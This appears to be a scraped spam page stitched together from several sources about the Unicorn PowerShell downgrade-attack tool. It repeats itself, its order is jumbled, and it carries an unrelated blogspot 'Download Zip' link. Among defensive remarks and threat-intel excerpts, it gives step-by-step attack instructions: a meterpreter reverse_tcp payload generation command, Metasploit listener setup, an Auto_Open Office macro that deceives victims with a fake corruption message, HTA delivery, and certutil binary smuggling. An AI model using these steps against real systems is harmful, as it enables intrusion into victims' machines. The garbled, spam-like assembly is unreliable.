These files will be saved in the directory where unicorn was cloned. Powershell_attack.txt holds the malicious code and when the victim will execute that code in his command prompt, the attacker will get a reverse connection of his machine.
The HTA attack will automatically generate two files. index.html tells the browser to use launcher.hta which contains the malicious powershell injection code. All files will be exported to the hta_access/ folder. Three main files:
Unicorn – PowerShell Downgrade Attack
Download Zip: https://sionauprevag.blogspot.com/?wd=2vzS3G
The Cerutil attack allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. It allows you to transfer a binary to the victim machine through a fake certificate file. To get the base64 output, just place an executable in the path of unicorn and run the following:
Usage is simple, Just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Getting StartedGo over to TrustedSec GitHub Unicorn Repository and download the latest version of unicorn by clicking the Download Zip button on the left of the page.
After you run the command it generates two files powershell_attack.txt and unicorn.rc. the text file contains all of the code needed in order to inject the PowerShell attack into memory.The rc file can be used with metasploit to quickly open up listener on the port you specified in the command.msfconsole -r unicorn.rcWhen the listener is all set up, open up the powershell_attack.txt file and copy that directly into command prompt, hit enter and you will shortly receive a session in Metasploit.Macro Attackpython unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macromacro added to the end of the command formats the powershell_attack.txt file to be inserted as a macro into word or excel.Open up word or excel go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that.
The HTA attack will automatically generate two files, the first the index.html which tells the browser to use Launcher.hta which contains the malicious powershell injection code. All files are exported to the hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit.A user must click allow and accept when using the HTA attack in order for the powershell injection to work properly.Cerutil Attackpython unicorn.py crtThe certutil attack vector was identified by Matthew Graeber (@mattifestation) which allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of unicorn and run python unicorn.py crt in order to get the base64 output. Once thats finished, go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a windows machine to convert it back to a binary.
As you may have noticed, peppered in between the security measures I suggested you take, I also mentioned that there are still ways for an adversary to get around some of those methods. Some of these bypass techniques are PowerShell downgrade attacks, process injection, and PowerShell obfuscation, etc. However, they are still valuable because not every attacker knows how to execute these bypass attacks, so they will provide protection against less skilled adversaries (which may be the majority of them.) Also keep in mind that you can run PowerShell scripts without calling powershell.exe.
Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.
Unicorn, created by TrustedSec, is a simple tool designed to assist penetration tester's with PowerShell downgrade attacks and injecting sophisticated shellcode payloads straight into memory. The techniques utilized by Unicorn are based on the work of Matthew Graeber and TrustedSec founder David Kennedy.
When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txt command. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.
This generates a Macro payload that initiates a reverse HTTPS connection on port 443 to our pentest server at cdn-01.example.com. Using a DNS name instead of an IP address means that we can move our pentest server to another IP address and clients will connect back to us as long as they can resolve our domain. Once the command completes we'll have a text file named "powershell_attack.txt" containing the Macro we need.
In this article, we will use Unicorn, this is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. This is a simple Python script which generates malware via templates.
Other tools used by UNC3890 include the Metasploit penetration testing software and Unicorn, a publicly available utility for conducting a PowerShell downgrade attack and injecting shellcode into memory.
The second tool is Sugarush, a backdoor used to establish a connection with an embedded C2 and to execute CMD commands. Other tools used by UNC3890 include Unicorn (a tool for conducting a PowerShell downgrade attack and to inject a shellcode into memory), Metasploit, and Northstar C2 (an open-source C2 framework developed for penetration testing and red teaming).
use unicorn GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.It is specifically created for this purpose.
I would add Windows PowerShell Event Logs to this list as well. Attackers will occasionally try to downgrade from later to earlier versions of PowerShell in order to prevent logging, so you should consider uninstalling PowerShell version 2 and enabling logging on a more recent version (3 and up) where possible. This should effectively reduce your attack surface. 2ff7e9595c
Comments